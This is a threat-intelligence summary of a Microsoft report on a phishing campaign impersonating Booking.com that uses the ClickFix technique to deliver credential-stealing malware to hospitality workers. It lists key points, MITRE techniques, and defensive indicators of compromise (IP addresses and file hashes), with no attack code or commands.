FOCUS MODE
EXTRACT IOC
Threat Research

Phishing campaign impersonates Booking dot com delivers a suite of credential stealing malware

microsoft
Phishing campaign impersonates Booking dot com delivers a suite of credential stealing malware
A phishing campaign impersonating Booking.com has been identified targeting organizations within the hospitality sector, particularly in relation to travel. Using the ClickFix social engineering technique, this campaign seeks to steal credentials and engage in financial fraud, affecting various regions including North America and Europe. Affected: hospitality industry, Booking.com users

Keypoints :

  • Microsoft Threat Intelligence identified a phishing campaign targeting the hospitality industry, linked to Booking.com.
  • The campaign employs the ClickFix social engineering technique to acquire user credentials.
  • Fake emails are sent to individuals working with Booking.com, prompting them to install malware.
  • The campaign is labeled as Storm-1865 and is ongoing as of February 2025.
  • Targets include individuals in North America, Oceania, South, Southeast, Northern, Southern, Eastern, and Western Europe.
  • Educating users about phishing scams is vital for reducing impact.
  • The malware delivered includes XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
  • Recommendations include the implementation of multi-factor authentication and phishing-resistant methods.
  • Detecting key indicators of the campaign is critical for cybersecurity efforts.

MITRE Techniques :

  • T1071.001 – Application Layer Protocol: Uses web traffic for command and control (C2) communications.
  • T1204.002 – User Execution: Exploits user action to execute malicious code via social engineering, prompting users to paste commands into Windows Run.
  • T1203 – Exploitation for Client Execution: Installs malware via malicious documents or web pages.
  • T1060 – Registry Run Keys / Startup Folder: Malware executed during system boot via modifications to run keys.
  • T1064 – Scripting: Utilizes scripts (e.g., PowerShell, JavaScript) to facilitate malware execution.

Indicator of Compromise :

  • [IP Address] 92.255.57.155
  • [IP Address] 147.45.44.131
  • [IP Address] 176.113.115.170
  • [IP Address] 31.177.110.99
  • [IP Address] 185.7.214.54
  • [File hash (SHA-256)] 01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6
  • [File hash (SHA-256)] f87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981e
  • [File hash (SHA-256)] 0c96efbde64693bde72f18e1f87d2e2572a334e222584a1948df82e7dcfe241d

Full Story: https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/

Tags: HUNT, CREDENTIAL, XDR, PAYLOAD, FINANCIAL, LEARN, WINDOWS, PHISHING